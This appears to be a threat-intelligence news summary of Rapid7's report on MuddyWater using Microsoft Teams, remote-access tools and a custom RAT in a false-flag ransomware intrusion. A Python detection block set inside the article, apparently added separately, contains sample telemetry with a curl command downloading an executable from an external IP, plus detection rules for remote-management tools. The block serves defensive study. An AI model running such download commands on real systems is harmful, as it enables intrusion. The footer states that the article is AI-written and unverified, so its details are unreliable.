Concise Cyber

MuddyWater Abuses Microsoft Teams in False Flag Ransomware Attack to Steal Credentials

The Iranian state-sponsored threat group known as MuddyWater has been linked to a ransomware-related intrusion that researchers say was designed to look like a typical criminal extortion campaign. According to Rapid7, the attack observed in early 2026 used Microsoft Teams for social engineering, credential harvesting, and multi-factor authentication manipulation before shifting into data theft and persistence rather than traditional file encryption.

The incident has been described as a false flag operation because it initially resembled activity associated with a ransomware-as-a-service group operating under the Chaos brand. However, the evidence collected by researchers points to a targeted operation that used ransomware branding and tactics as cover while serving a broader strategic objective.

Microsoft Teams Used as the Entry Point

Rapid7 said the campaign began with a high-touch social engineering phase conducted through Microsoft Teams. The attackers initiated external chat requests and used interactive screen-sharing sessions to gain trust, obtain credentials, and interfere with MFA. In at least one instance, they instructed users to enter credentials into locally created text files.

Once access was obtained, the attackers did not follow a standard ransomware playbook. Instead of immediately encrypting files, they focused on deeper access, reconnaissance, and persistence inside the victim environment. The investigation found that they used compromised user accounts to move through the network and expand their foothold.

Persistence, Remote Access, and Data Theft

Rapid7 reported that the intruders used remote management tools such as DWAgent and AnyDesk to maintain access. Working over RDP, they used the curl utility to download an executable named ms_upd.exe from an external server. Once executed, the binary triggered a multi-stage infection chain that delivered additional components.

The campaign involved:

  • ms_upd.exe (also called Stagecomp), which gathered system information and contacted a command-and-control server
  • game.exe (also called Darkcomp), a bespoke remote access trojan masquerading as a legitimate Microsoft WebView2 application
  • WebView2Loader.dll, a legitimate DLL required by Microsoft Edge WebView2
  • visualwincomp.txt, an encrypted configuration used by the RAT to retrieve C2 information

The RAT was designed to poll for new commands every 60 seconds. It could run commands or PowerShell scripts, perform file operations, and spawn an interactive cmd.exe or PowerShell shell. Rapid7 also said the victim was later contacted by email for ransom negotiations.
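As an added, defender-side illustration (not code from this page or from Rapid7's report), the following Python sketches how the chain described above could be surfaced from process-creation telemetry: it flags curl downloading an executable, launches of DWAgent or AnyDesk, binaries signed under the certificate name the report cites, and shells spawned by an unexpected parent, then correlates the hits per user. The event records, field names, and paths are constructed assumptions.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (not real telemetry; field names are assumed).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"user": "alice", "image": r"C:\Windows\System32\curl.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"curl.exe -o C:\Users\alice\Downloads\ms_upd.exe http://203.0.113.10/ms_upd.exe", "signer": ""},
    {"user": "alice", "image": r"C:\Users\alice\Downloads\ms_upd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "ms_upd.exe", "signer": "Donald Gay"},
    {"user": "alice", "image": r"C:\ProgramData\WebView2\game.exe", "parent": r"C:\Users\alice\Downloads\ms_upd.exe",
     "cmdline": "game.exe", "signer": ""},
    {"user": "alice", "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\ProgramData\WebView2\game.exe",
     "cmdline": "cmd.exe", "signer": ""},
    {"user": "bob", "image": r"C:\Program Files\AnyDesk\AnyDesk.exe", "parent": r"C:\Windows\System32\services.exe",
     "cmdline": "AnyDesk.exe --service", "signer": "AnyDesk Software GmbH"},
    {"user": "carol", "image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe", "signer": "Microsoft Windows"},
]

RMM_BINARIES = {"dwagent.exe", "anydesk.exe"}       # remote management tools named in the report
SUSPECT_SIGNERS = {"donald gay"}                    # certificate name the report ties to MuddyWater
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
EXPECTED_SHELL_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "services.exe", "winlogon.exe"}
# curl invoked with an output file ending in .exe and an http(s) URL on the same command line
CURL_EXE_DOWNLOAD = re.compile(r"\s-[oO]\s*\S+\.exe\b.*https?://", re.IGNORECASE)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches (empty list if nothing matched)."""
    image, parent = basename(event["image"]), basename(event["parent"])
    hits = []
    if image == "curl.exe" and CURL_EXE_DOWNLOAD.search(event["cmdline"]):
        hits.append("curl_exe_download")
    if image in RMM_BINARIES:
        hits.append("rmm_tool_launch")
    if event.get("signer", "").lower() in SUSPECT_SIGNERS:
        hits.append("suspect_code_signer")
    if image in SHELLS and parent not in EXPECTED_SHELL_PARENTS:
        hits.append("shell_from_unexpected_parent")
    return hits

def users_with_chain(events: List[Dict[str, str]], min_rules: int = 2) -> List[str]:
    """Users whose events trip at least min_rules distinct rules, i.e. resemble the staged chain."""
    per_user: Dict[str, set] = {}
    for ev in events:
        per_user.setdefault(ev["user"], set()).update(classify(ev))
    return sorted(u for u, rules in per_user.items() if len(rules) >= min_rules)
```

A single rule firing (bob's AnyDesk service) is routine in many environments; the per-user correlation is what separates the staged sequence from ordinary administration.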

Why Researchers Linked the Attack to MuddyWater

The attribution to MuddyWater was supported in part by the use of a code-signing certificate attributed to Donald Gay to sign ms_upd.exe. According to the report, the same certificate had previously been used by the group to sign other malware, including a CastleLoader downloader called Fakeset.

Researchers said the campaign fits a pattern in which MuddyWater increasingly relies on off-the-shelf tools from the cybercrime underground to obscure attribution. That approach has also been noted in recent reporting by Ctrl-Alt-Intel, Broadcom, Check Point, and JUMPSEC, including references to CastleRAT and Tsundere.

Connection to Earlier MuddyWater Operations

This is not the first time MuddyWater has been associated with ransomware-themed activity. In September 2020, the group was tied to a campaign against prominent Israeli organizations that used a loader called PowGoop to deploy a variant of Thanos ransomware with destructive capabilities. In 2023, Microsoft said MuddyWater worked with DEV-1084, a threat actor linked to the DarkBit persona, in destructive attacks under the guise of ransomware deployment. More recently, in October 2025, the attackers were believed to have used Qilin ransomware in an attack on an Israeli government hospital.

Check Point said in March that the operators appeared to be Iranian-affiliated actors using the cybercriminal ecosystem, a criminal ransomware brand, and methods associated with extortion to support a strategic objective. The company noted that use of Qilin and participation in its affiliate program may have provided cover and operational value. The root cause of the intrusion has not been confirmed beyond the social engineering and access methods described by researchers.

What the Chaos Brand Signaled

Rapid7’s analysis also highlighted the wider ransomware environment around the Chaos brand. Chaos emerged in early 2025 and is known for a double extortion model. Its affiliate program has been advertised on cybercrime forums such as RAMP and RehubCom. The group has used mail flooding and vishing through Teams, often by impersonating IT support staff, to push victims to install remote access tools like Microsoft Quick Assist.

Rapid7 said Chaos affiliates have also used triple extortion by threatening DDoS attacks, and in some cases quadruple extortion by threatening to contact customers or competitors. As of late March 2026, Chaos had claimed 36 victims on its data leak site, with most located in the U.S. Construction, manufacturing, and business services were among the prominent sectors targeted.

Conclusion

Rapid7’s findings show how MuddyWater blended state-backed intrusion methods with criminal-style ransomware tactics to disguise its activity. By using Microsoft Teams, remote management tools, and malware that mimicked legitimate software, the group appears to have aimed for credential theft, persistence, and data exfiltration rather than straightforward encryption.

All articles are written here with the help of AI on the basis of openly available information which cannot be independently verified. We do strive to quote the relevant sources. The intent is only to summarise what is already reported in public forum in our own words with no intention to plagiarise or copy other person's work. The publisher has no intent to defame or cause offence to anyone, any person or any organisation at any moment. The publisher assumes no responsibility for any damage or loss caused by making decisions on the basis of whatever is published on cyberconcise.com. You're advised to do your own checks and balances before making any decision, and owners and publishers at cyberconcise.com cannot be held accountable for its resulting ramifications. If you have any objections, concerns or point out anything factually incorrect, please reach out using the form on https://concisecyber.com/about/
